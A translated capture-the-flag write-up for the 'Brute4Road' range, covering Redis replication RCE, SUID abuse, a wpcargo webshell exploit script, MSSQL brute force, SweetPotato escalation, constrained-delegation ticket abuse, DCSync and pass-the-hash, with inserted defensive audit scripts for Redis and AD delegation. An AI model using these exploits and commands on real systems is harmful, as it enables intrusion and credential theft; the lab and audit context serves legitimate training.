
Title: Spring and Autumn Cloud Mirror-[Simulation Scene] Brute4Road writeup


Instructions

Brute4Road is a medium-difficulty range environment. Completing this challenge helps players understand the techniques of proxy forwarding, intranet scanning, information gathering, privilege escalation and lateral movement used in intranet penetration, strengthens their understanding of the core authentication mechanisms of a domain environment, and teaches some interesting technical points of domain penetration. The range contains 4 flags, distributed across different target machines.

Technology

Redis, Brute Force, SMB, Privilege Escalation, Domain Penetration

First flag

Redis master-slave replication RCE

Scan the entry IP with fscan. If the entry IP shown below changes, it is because the environment was restarted; the process is unaffected.

Unauthenticated Redis was found. Writing a cron job to get a reverse shell was tried first, but it reported no permission. Redis master-slave replication RCE then succeeded.
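Added example, not from the original writeup: a small audit of a redis.conf for the settings that make the unauthenticated replication RCE above possible (no requirepass, protected-mode off, bind on all interfaces, SLAVEOF/REPLICAOF/MODULE/CONFIG left reachable). The two sample configs are constructed.

```python
# Commands used by the master-slave replication RCE chain: SLAVEOF/REPLICAOF point the
# instance at a rogue master, MODULE loads the shipped .so, CONFIG rewrites dir/dbfilename
# for arbitrary file writes, DEBUG can crash the server. Renaming them to "" disables them.
RISKY_COMMANDS = ("slaveof", "replicaof", "module", "config", "debug")


def parse_redis_conf(text: str) -> dict:
    """Return {directive: [argument-string, ...]} for the active lines of a redis.conf."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, rest = line.partition(" ")
        conf.setdefault(key.lower(), []).append(rest.strip())
    return conf


def audit_redis_conf(text: str) -> list:
    """List the settings that let an unauthenticated client reach replication."""
    conf = parse_redis_conf(text)
    findings = []
    password = conf.get("requirepass", [""])[0]
    if password in ("", '""', "''"):
        findings.append("no requirepass: any client can issue SLAVEOF/MODULE LOAD")
    if conf.get("protected-mode", ["yes"])[0].lower() != "yes":
        findings.append("protected-mode is off")
    binds = " ".join(conf.get("bind", [])).split()
    if not binds or any(b in ("0.0.0.0", "*", "::") for b in binds):
        findings.append("bind exposes Redis on every interface")
    renamed = {args.split()[0].lower() for args in conf.get("rename-command", []) if args}
    for cmd in RISKY_COMMANDS:
        if cmd not in renamed:
            findings.append(f'{cmd.upper()} is still reachable (add: rename-command {cmd.upper()} "")')
    return findings


# Constructed sample configs: an exposed instance like the one in the writeup, and a hardened one.
WEAK_CONF = "bind 0.0.0.0\nprotected-mode no\nport 6379\n"
HARDENED_CONF = (
    "bind 127.0.0.1\nprotected-mode yes\nrequirepass replace-with-a-long-random-secret\n"
    + "".join(f'rename-command {c.upper()} ""\n' for c in RISKY_COMMANDS)
)

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(conf) or ["no findings"])
```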

SUID privilege escalation

We are the redis user and need to escalate privileges; SUID binaries are used for this. Run the following commands (for details, see "SUID privilege escalation on Linux systems" [1]):

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} \;

base64 has the SUID bit set, so we can read a local file with base64 and decode the output to get the first flag:

base64 '/home/redis/flag/flag01' | base64 --decode

The second flag

wpcargo unauthorized RCE

Set up a proxy on the entry-point server and scan the intranet; upload npc and fscan via wget.

start ping

(icmp) Target 172.22.2.18 is alive

(icmp) Target 172.22.2.34 is alive

(icmp) Target 172.22.2.3 is alive

(icmp) Target 172.22.2.7 is alive

(icmp) Target 172.22.2.16 is alive

[*] Icmp alive hosts len is: 5

172.22.2.16:445 open

172.22.2.34:445 open

172.22.2.3:445 open

172.22.2.18:445 open

172.22.2.16:139 open

172.22.2.34:139 open

172.22.2.3:139 open

172.22.2.34:135 open

172.22.2.16:135 open

172.22.2.18:139 open

172.22.2.3:135 open

172.22.2.16:80 open

172.22.2.3:88 open

172.22.2.18:22 open

172.22.2.7:80 open

172.22.2.7:22 open

172.22.2.7:6379 open

172.22.2.16:1433 open

172.22.2.7:21 open

172.22.2.18:80 open

[*] alive ports len is: 20

start vulscan

[+] NetInfo:

[*]172.22.2.16

[-]MSSQLSERVER

[-]172.22.2.16

[*] 172.22.2.34 XIAORANG\CLIENT01

[*] 172.22.2.16 (Windows Server 2016 Datacenter 14393)

[+] NetInfo:

[*]172.22.2.3

[-]DC

[-]172.22.2.3

[*] WebTitle:http://172.22.2.16 code:404 len:315 title:Not Found

[+] NetInfo:

[*]172.22.2.34

[-]CLIENT01

[-]172.22.2.34

[*] WebTitle:http://172.22.2.7 code:200 len:4833 title:Welcome to CentOS

[*] 172.22.2.16 XIAORANG\MSSQLSERVER Windows Server 2016 Datacenter 14393

[*] 172.22.2.3 [+]DC XIAORANG\DC Windows Server 2016 Datacenter 14393

[*] 172.22.2.18 WORKGROUP\UBUNTU-WEB02

[*] 172.22.2.3 (Windows Server 2016 Datacenter 14393)

[+] ftp://172.22.2.7:21:anonymous

[-]pub

[*] WebTitle:http://172.22.2.18 code:200 len:57738 title:Another WordPress site

Use wpscan to scan the WordPress site:

proxychains wpscan --url http://172.22.2.18

The wpcargo plugin is present. Searching for related vulnerabilities turns up an unauthenticated RCE:

https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a

Exploit script:

import binascii
import requests

# This is a magic string that, when treated as pixels and compressed using the PNG
# algorithm, will cause <?=$_GET[1]($_POST[2]); to be written to the PNG file
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'

def encode_character_code(c: int):
    return '{:08b}'.format(c).replace('0', 'x')

text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]

destination_url = 'http://172.22.2.18/'
cmd = 'ls'

# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.
requests.get(
    f'{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.09090909090909&size=1&filepath=/var/www/html/webshell.php'
)

# We have uploaded a webshell - now let's use it to execute a command.
print(requests.post(
    f'{destination_url}webshell.php?1=system', data={'2': cmd}
).content.decode('ascii', 'ignore'))

Running it generates the webshell:

http://172.22.2.18/webshell.php?1=system

POST: 2=whoami

Connect with AntSword; pay attention to the connection type and choose cmdLinux (this wasted a lot of time because I was not familiar with the tool).

View the database configuration and connect to the database.

Find the second flag.

The third flag

A table for storing passwords


MSSQL Server RCE

Use the password table just obtained from the database to brute-force MSSQL; the password is ElGNkOiC.

Connect using the Multiple.Database.Utilization.Tools tool.

First enable the Ole Automation Procedures component, then upload SweetPotato.exe to escalate privileges and obtain SYSTEM:

C:/Users/MSSQLSERVER/Desktop/SweetPotato.exe -a 'netstat -ano'

3389 is found to be open, so add a user directly and connect over RDP:

net user devyn Admin123 /add

net localgroup administrators devyn /add

The remote connection succeeds.

Get the third flag.

The fourth flag

Domain penetration

Use mimikatz to dump the hash of the domain user.

The hash obtained for the domain account is 78a2811aabd779d0da3cef84903ca3e6

Constrained delegation attack

The MSSQLSERVER machine is configured with constrained delegation to the DC's LDAP and CIFS services.

First request a TGT for the machine account MSSQLSERVER$ through Rubeus. After execution you get the Base64-encoded TGT:

Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:78a2811aabd779d0da3cef84903ca3e6 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap

Then use the S4U2Self extension to impersonate the domain administrator Administrator, request a ticket for the domain controller's LDAP service, and pass the resulting ticket into memory:

Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:LDAP/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:<base64 TGT returned by the asktgt step>

The LDAP service ticket carries DCSync permissions, so the hashes of domain users can be exported:

mimikatz.exe 'lsadump::dcsync /domain:xiaorang.lab /user:Administrator' exit

Domain administrator hash obtained: 1a19251fbd935969832616366ae3fe62
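Added example, not from the original writeup: a check over AD account records (constructed here, modelled on xiaorang.lab) for exactly the configuration the attack above relies on, constrained delegation to a DC service with protocol transition enabled, plus the "account is sensitive and cannot be delegated" flag that would have blocked impersonating Administrator. Account names other than those on the page, and the record format, are assumptions.

```python
from dataclasses import dataclass, field

# userAccountControl bits (ADS_USER_FLAG values)
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # "use any authentication protocol": S4U2Self for any user
NOT_DELEGATED = 0x100000                    # "account is sensitive and cannot be delegated"
# Services whose tickets are worth the domain: LDAP gives DCSync, CIFS gives SYSVOL/NTDS, HOST is broad.
HIGH_VALUE_SERVICES = {"ldap", "cifs", "host"}


@dataclass
class Account:
    """Subset of the AD attributes an LDAP export would provide (constructed records below)."""
    sam: str
    uac: int
    allowed_to_delegate_to: list = field(default_factory=list)  # msDS-AllowedToDelegateTo


def audit_constrained_delegation(accounts, domain_controllers):
    """Flag accounts allowed to delegate to a DC service; protocol transition makes it critical."""
    dcs = {dc.lower() for dc in domain_controllers}
    findings = []
    for acct in accounts:
        for spn in acct.allowed_to_delegate_to:
            service, _, host = spn.partition("/")
            if host.split(":")[0].lower() in dcs and service.lower() in HIGH_VALUE_SERVICES:
                critical = bool(acct.uac & TRUSTED_TO_AUTH_FOR_DELEGATION)
                findings.append((acct.sam, spn, "critical" if critical else "high"))
    return findings


def audit_sensitive_accounts(accounts, privileged):
    """Privileged users without NOT_DELEGATED can be impersonated via S4U2Self/S4U2Proxy."""
    return [a.sam for a in accounts if a.sam in privileged and not (a.uac & NOT_DELEGATED)]


# Constructed records modelled on the writeup's domain; svc_backup is an assumed extra account.
ACCOUNTS = [
    Account("MSSQLSERVER$", 0x1000 | TRUSTED_TO_AUTH_FOR_DELEGATION,
            ["LDAP/DC.xiaorang.lab", "CIFS/DC.xiaorang.lab"]),
    Account("CLIENT01$", 0x1000),
    Account("Administrator", 0x200),
    Account("svc_backup", 0x200 | NOT_DELEGATED),
]
DOMAIN_CONTROLLERS = ["DC.xiaorang.lab"]
PRIVILEGED = {"Administrator", "svc_backup"}

if __name__ == "__main__":
    for finding in audit_constrained_delegation(ACCOUNTS, DOMAIN_CONTROLLERS):
        print("delegation:", finding)
    print("not marked sensitive:", audit_sensitive_accounts(ACCOUNTS, PRIVILEGED))
```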

WMI lateral movement

With the domain administrator hash, we can log in to the domain controller through the WMI service:

python wmiexec.py -hashes 00000000000000000000000000000000:1a19251fbd935969832616366ae3fe62 [email protected]

Get the fourth flag.

Another method

The domain controller can also be reached directly with the hash; here crackmapexec is used for pass-the-hash (PTH):

proxychains crackmapexec smb 172.22.2.3 -u administrator -H 1a19251fbd935969832616366ae3fe62 -d xiaorang.lab -x 'type Users\Administrator\flag\flag04.txt'

Original link: https://zhuanlan.zhihu.com/p/581577873
